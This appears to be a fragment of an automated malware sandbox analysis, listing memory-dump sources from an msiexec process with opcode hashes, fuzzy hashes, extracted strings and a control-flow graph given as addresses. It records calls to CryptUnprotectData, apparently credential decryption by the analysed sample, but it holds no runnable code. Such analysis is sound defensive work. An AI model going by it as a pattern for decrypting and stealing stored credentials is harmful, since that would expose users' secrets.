                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: c93fbcc9e5d98e4d6961fbc3a637493ef5b4e56a90d1748d218ba4b03ea6d172
                                                                                                                                                                                    • Instruction ID: 902a4db1eda29c75b6e55eb71f62e06b50f9e58bdfef4f4d94f0a861049f81b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: c93fbcc9e5d98e4d6961fbc3a637493ef5b4e56a90d1748d218ba4b03ea6d172
                                                                                                                                                                                    • Instruction Fuzzy Hash: E181D374E01208DFDB54DFAAD984A9DBBF2BF88300F14C069E809AB365DB349985CF54

Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 24018F5D
Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 24018F5D
Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: !
• API String ID: 0-2657877971
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                    • Opcode ID: 36d52d0615b75fbbfac6f1f83042cd69c055ab792b69b8795a4e5521966485fa
                                                                                                                                                                                    • Instruction ID: 036ab143e7beb90b36f4b01cbd23ae58733dec8afd929a4ec9d6051d074a2464
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d52d0615b75fbbfac6f1f83042cd69c055ab792b69b8795a4e5521966485fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22A10674D00208CFEB14DFA9C984BDDBBB1FF89314F209269E509AB291DB749985CF54
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3bab5134b9a0d310b6619c0b8ff5867bcbc0ca3257b29a2469810f10e55029b7
                                                                                                                                                                                    • Instruction ID: d83450ae22d2bdf8371dff6453dfc45981a9ec47be2949fb2bb6fc0d227db9b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bab5134b9a0d310b6619c0b8ff5867bcbc0ca3257b29a2469810f10e55029b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20A1F574D00208CFEB14DFA9C984BDDBBB1FF89314F209269E508AB2A1DB749985CF54
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 44ef2cfeed55ca879412321035986b006035b956ff5160f2fc195d0438aa646b
                                                                                                                                                                                    • Instruction ID: cd45601e8723c6aeb3753e6a247c2bc20d3dab452f4b2bd3ace9313120c9854e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ef2cfeed55ca879412321035986b006035b956ff5160f2fc195d0438aa646b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 92A1A2B4E05219CFEB64CF6AC944B9DFAF2BF89300F14C1AAD508A7254DB345A85CF51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: df83ee9f6a2a26d8ee1276846d15b84abf7f1f6280736ecbdc825ae8128491e7
                                                                                                                                                                                    • Instruction ID: a00522bd79bdac806125dd656c3900f55194b2c508b942edbc3e387f369cc4e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: df83ee9f6a2a26d8ee1276846d15b84abf7f1f6280736ecbdc825ae8128491e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27A1A2B4E05219CFEB64CF6AC984B9DBBF2BF89300F14C1A9D508A7254EB345A85CF51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b9f87fecd7bb41db4fcebc6f5224d6b143941556aba774bbe2482d5e230843d6
                                                                                                                                                                                    • Instruction ID: 76323216c0cd9e65070bc36e56351efc5aaad98817e745ba787cd3bb1f108278
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9f87fecd7bb41db4fcebc6f5224d6b143941556aba774bbe2482d5e230843d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C911374E04208DFEB50DFA9C984BDDBBB1FF89310F209269E509AB291DB749985CF14
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9c2f289dc7eba53df74276536f1a1bb998ac723211291cd960cf9322fd5d7ede
                                                                                                                                                                                    • Instruction ID: c2b101300cd8d2fa22f2b5568d6874c1216166106b015644867d30a917513f2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2f289dc7eba53df74276536f1a1bb998ac723211291cd960cf9322fd5d7ede
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B81E274E00219DFDB54DFA9C990A9DBBB2FF89300F208429D804BB358EB399946CF54
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e44dbb870667dfddd2fe8c4f25788f6f0942da93c1a0c4fb2804af6e17a83844
                                                                                                                                                                                    • Instruction ID: 9feea560746dc757e33c5e35d8321623419e97697510354b4a6516d590cdaa6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e44dbb870667dfddd2fe8c4f25788f6f0942da93c1a0c4fb2804af6e17a83844
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E71A375D05218DFDB64CF66C984BDDBBB2BF89301F1484AAD408A7364DB359A86CF40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 46159c83cd7082638218a453db9a6aa496fe514fb9c83f411237220d722fc5cb
                                                                                                                                                                                    • Instruction ID: 17a9bb1c3d8efe0c20c8a7ca87fb857ccb6a5c4bba796952240422b2e9e229c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46159c83cd7082638218a453db9a6aa496fe514fb9c83f411237220d722fc5cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F71A5B5E012198FEB68CF6AC944B9EBBF2BF89300F14C1E9D508A7254DB744A85CF50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ebfb67c504728b51620ea0b746629974be9979c496ecf10ed70e9b159110f9c3
                                                                                                                                                                                    • Instruction ID: d152fc5c80022f20911abf5a42f1caac3e96bd566a940a0391d557b8d5f804d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebfb67c504728b51620ea0b746629974be9979c496ecf10ed70e9b159110f9c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: B251B574E01208DFDB18DFAAD594A9DBBB2FF88300F24C469E815AB364DB359846CF54
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 503990967aa89e3d85fb06af737bc49026f7a652019a14c22748feb82c20d983
                                                                                                                                                                                    • Instruction ID: a6b8a8819c477436da35437ef1fad7b04c7f3a6b023298d0badc4bd2850bec7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 503990967aa89e3d85fb06af737bc49026f7a652019a14c22748feb82c20d983
                                                                                                                                                                                    • Instruction Fuzzy Hash: D851C574E01208DFDB18DFAAD594A9DBBF2BF88300F248469E815AB364DB359945CF14

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 21a53fe8-21a53ff1 1 21a53ff3-21a53ff8 0->1 2 21a53ffa-21a53ffd 0->2 3 21a54032-21a54035 1->3 4 21a54006-21a54009 2->4 5 21a53fff-21a54004 2->5 6 21a54012-21a54015 4->6 7 21a5400b-21a54010 4->7 5->3 8 21a54017-21a5401c 6->8 9 21a5401e-21a54021 6->9 7->3 8->3 10 21a54023-21a54028 9->10 11 21a5402a-21a5402d 9->11 10->3 12 21a54036-21a540a6 11->12 13 21a5402f 11->13 20 21a540ab-21a540ba call 21a53f90 12->20 13->3 23 21a54103-21a54106 20->23 24 21a540bc-21a540d7 20->24 25 21a5411c-21a5414b 23->25 26 21a54108-21a5410e 23->26 24->23 36 21a540d9-21a540dd 24->36 32 21a54157-21a5415d 25->32 33 21a5414d-21a54150 25->33 26->20 28 21a54110 26->28 29 21a54112-21a54119 28->29 34 21a54171-21a541a5 32->34 35 21a5415f-21a54162 32->35 33->32 37 21a54152-21a54155 33->37 35->34 38 21a54164-21a54166 35->38 39 21a540e6-21a540ef 36->39 40 21a540df-21a540e4 36->40 37->32 41 21a541a8-21a54200 37->41 38->34 42 21a54168-21a5416b 38->42 39->23 43 21a540f1-21a540fa 39->43 40->29 45 21a54207-21a54287 41->45 42->34 42->45 43->23 46 21a540fc-21a54101 43->46 65 21a542a7-21a542fd 45->65 66 21a54289-21a5428d 45->66 46->29 72 21a542ff-21a54306 65->72 73 21a54308-21a54311 65->73 102 21a54290 call 21a54385 66->102 103 21a54290 call 21a53fd7 66->103 104 21a54290 call 21a54351 66->104 105 21a54290 call 21a54088 66->105 106 21a54290 call 21a53fe8 66->106 68 21a54293-21a542a4 74 21a54323-21a5432c 72->74 75 21a54313-21a5431a 73->75 76 21a5431c 73->76 77 21a543c0-21a543c4 74->77 78 21a54332-21a5434f 74->78 75->74 76->74 79 21a543cd-21a543e9 77->79 107 21a543c7 call 21a544cf 77->107 78->79 83 21a543f0-21a5444a 79->83 84 21a543eb-21a543ee 79->84 85 21a54452-21a5445b 83->85 84->83 84->85 86 21a54462-21a54498 85->86 87 21a5445d-21a54460 85->87 89 21a544c7-21a544cd 86->89 98 21a5449a-21a544bf 86->98 87->86 87->89 98->89 102->68 103->68 104->68 105->68 106->68 107->79
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8cq$Hbq$Hbq$Hbq$TJcq
• API String ID: 0-1895975235
• Opcode ID: 0ebcfc15f17d13ed07e3510e408af311963d47d9d13999508be0962a20ef14df
• Instruction ID: 8387fe1d187aee6b8118e1384088e85b2fd5e4b0c39717de809251ced69105d5
• Opcode Fuzzy Hash: 0ebcfc15f17d13ed07e3510e408af311963d47d9d13999508be0962a20ef14df
• Instruction Fuzzy Hash: E2D1B234F082049FC745DB68C894AAE7BF6FF89320F2441A9E505EB3A1DA35DD46CB91

Control-flow Graph (graph data not reproduced)
Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: $Hbq$Hbq$Hbq
• API String ID: 0-580995494
• Opcode ID: 06eab44ff74e914e609449d329ca8e418a80cd101e9e21ca40d6f7dbbb73d6fc
• Instruction ID: bd4aacfa11d139fccb97390a139272f02ae9b967c67db9599cd14e50c9fdda7e
• Opcode Fuzzy Hash: 06eab44ff74e914e609449d329ca8e418a80cd101e9e21ca40d6f7dbbb73d6fc
• Instruction Fuzzy Hash: 0BA10134B08304AFDB559F78889866E7BA6FFC6360F244669E5168B3D1DF348D02CB91

Control-flow Graph (graph data not reproduced)
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: Hbq$Hbq
• API String ID: 0-4258043069
• Opcode ID: a9c060002c6385a645f8e6e58ba7a7b0db231c2844ede392ec6f178fbf908cb5
• Instruction ID: df22768cafd2f1451de285662714fff68201619639b70929916887790ce41b27
• Opcode Fuzzy Hash: a9c060002c6385a645f8e6e58ba7a7b0db231c2844ede392ec6f178fbf908cb5
• Instruction Fuzzy Hash: 8991C0347056498FDB15EF38C89866E7BE6BF89301F188569E8468B391DF39CC02CB95

Control-flow Graph (graph data not reproduced)
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: ,bq$,bq
• API String ID: 0-2699258169
• Opcode ID: fc2e8171c85ddb4cb75636dc8f61f9f1891a9b1802a1a5187db02f6792a739ef
• Instruction ID: 71e3b9fd1f188d18c03061bfc1a2b5c3353eede45fea2e4f23d21e8df812b680
• Opcode Fuzzy Hash: fc2e8171c85ddb4cb75636dc8f61f9f1891a9b1802a1a5187db02f6792a739ef
• Instruction Fuzzy Hash: 4181B434E02909CFCB68CF69C48496EBBF2BF89600B588569D407DB364DB32E841CF65
Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8cq$TJcq
• API String ID: 0-1920894394
• Opcode ID: 7ef6f8c1bc10bbf301b31e2237a44cc81a50d8d0883ddecd716fc1d4f0d30555
• Instruction ID: f7e3e0536784314eea5c03bfc63d2820785dd8dd53ea2db11dfeed071bf99207
• Opcode Fuzzy Hash: 7ef6f8c1bc10bbf301b31e2237a44cc81a50d8d0883ddecd716fc1d4f0d30555
• Instruction Fuzzy Hash: 71310635B402099FCB45DFA8C580EDDBBB2FF88220F195594E505AF366DA30ED85CB91
Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8cq$TJcq
• API String ID: 0-1920894394
• Opcode ID: 6baa693c29591c407fae6fa4a6896c4e07683f0cb69e7f11069fa62d2d8f05d2
• Instruction ID: f49e519f765c8238a543f483b0306c2a0c4603bc028d002baab42dfbdded2417
• Opcode Fuzzy Hash: 6baa693c29591c407fae6fa4a6896c4e07683f0cb69e7f11069fa62d2d8f05d2
• Instruction Fuzzy Hash: CD312635B402098FCB45EFA8C580E9DBBB2FF88320F155594E505AF366DA70ED85CB90
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: LR^q
• API String ID: 0-2625958711
• Opcode ID: 9581aa2bfcb49bf107e8e197a7bc33031992bef7ca1caf3dd1df97b2fc5783fe
• Instruction ID: d64ab3e1ac20c65031ee047192bf8a3c58d9a362f62b102cb7b6be79888d69ce
• Opcode Fuzzy Hash: 9581aa2bfcb49bf107e8e197a7bc33031992bef7ca1caf3dd1df97b2fc5783fe
• Instruction Fuzzy Hash: 0E521078981219CFCB54EF24DD98A8DBBB1FB48301F1045E5D809AB758EB749E8ACF44
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
• String ID: LR^q
• API String ID: 0-2625958711
• Opcode ID: fd93310ebdff2959145f5ddc3e167da159d85a27eb1da221dad9e6b6c2afd35c
• Instruction ID: 66d02af8c0f797880b5164cb9d424b172c7d5a98f3e2b210c61128123f62e66b
• Opcode Fuzzy Hash: fd93310ebdff2959145f5ddc3e167da159d85a27eb1da221dad9e6b6c2afd35c
• Instruction Fuzzy Hash: DE522078D81219CFCB54EF24DD98A8DBBB1FB48301F1045A5D809AB758EB749E8ACF44
Strings
Memory Dump Source
• Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
Similarity
• API ID:
• String ID: Hbq
• API String ID: 0-1245868
• Opcode ID: 799d189379a8b1a6089f1f4ad841d14555f49c41dac740ca35fcae5f14e2b913
• Instruction ID: e2d02b24e7954e0431de9dedb61ff255934947b277bc406cbf59dd710e54235d
• Opcode Fuzzy Hash: 799d189379a8b1a6089f1f4ad841d14555f49c41dac740ca35fcae5f14e2b913
• Instruction Fuzzy Hash: 49318235F44209AFCB44EFB898556AE7BFAEFC9301B10857ED50ADB251EA348902C790
Strings
Memory Dump Source
• Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
Similarity
• API ID:
                                                                                                                                                                                    • String ID: (o^q
                                                                                                                                                                                    • API String ID: 0-74704288
                                                                                                                                                                                    • Opcode ID: 8142a94216de9fff043d4baccfefd66aff1ea5a5f55b1e64b21e8646ec591c05
                                                                                                                                                                                    • Instruction ID: e65bbb8311aaf7325a4b708d9c261ce14561d663443574262fba519cf956d2a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8142a94216de9fff043d4baccfefd66aff1ea5a5f55b1e64b21e8646ec591c05
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A210875B053509FC706AB7888141AEBFF6AFC626131844BAD415CB391CE358C06C795
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Hbq
                                                                                                                                                                                    • API String ID: 0-1245868
                                                                                                                                                                                    • Opcode ID: 06468db60cd2d48f51103ff285f6c557688af18a21d2a4ae742e7ad1a409b89e
                                                                                                                                                                                    • Instruction ID: 9ad42edee545bbbf2692031e0cf98f96c9a07c4fdaa0cfd3c210d6da163c89a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06468db60cd2d48f51103ff285f6c557688af18a21d2a4ae742e7ad1a409b89e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21E134A04245EFC745DF78C895AAEBBBAFFC5311F24806EE5059B361DA354D46CB40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5fd7b61a9e4b0d8a28f0f4fd3b6c10a0c96a715a3f7d6d0d8fb6df81d1837044
                                                                                                                                                                                    • Instruction ID: 6e6abd0982c8b8089fd9cd24f1ac476d5b8f448e8e5cb5f52efa87d66f06b115
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fd7b61a9e4b0d8a28f0f4fd3b6c10a0c96a715a3f7d6d0d8fb6df81d1837044
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0812997A0A56468FD2517B35D6EC12ABF61FB1F36B7246C40F02B98455FB38048ACF61
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2dc38dcf68a5fe762dd13ab6d4ac019e3f304d601769fb5c8ea3018e8165cffd
                                                                                                                                                                                    • Instruction ID: 14ca4bb3ab91dffecb1bf61be733272d86a8336001b13bae5dd139150be95ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dc38dcf68a5fe762dd13ab6d4ac019e3f304d601769fb5c8ea3018e8165cffd
                                                                                                                                                                                    • Instruction Fuzzy Hash: A812987E0A56468FE2517B25D6EC12ABB61FB1F36B7246C40F02F98454FB38048ACF61
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 28190a2b28686241e4507851a29e8178ab71b4936fb8cdc44faf7752c997e937
                                                                                                                                                                                    • Instruction ID: 0909338516375b5dc1675c37b0a7d5416df71e03c6d343e7ff7f080eef6b0cfa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28190a2b28686241e4507851a29e8178ab71b4936fb8cdc44faf7752c997e937
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE51D072E09205AFDB548F68D845AAABBF9FFC9320F15852EE519E7750E7309801CB60
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7d78c504e6560aeeb2ce81febbd4538ef2165da046a773d27a4a8b1240821644
                                                                                                                                                                                    • Instruction ID: 833ae62b955839fd1e2270775c211cabaa8695a724418c728b693205e0706403
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d78c504e6560aeeb2ce81febbd4538ef2165da046a773d27a4a8b1240821644
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6614074D01309DFCB15DFA4C984AAEBBB2FF89300F208529D809AB358DB399946CF40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
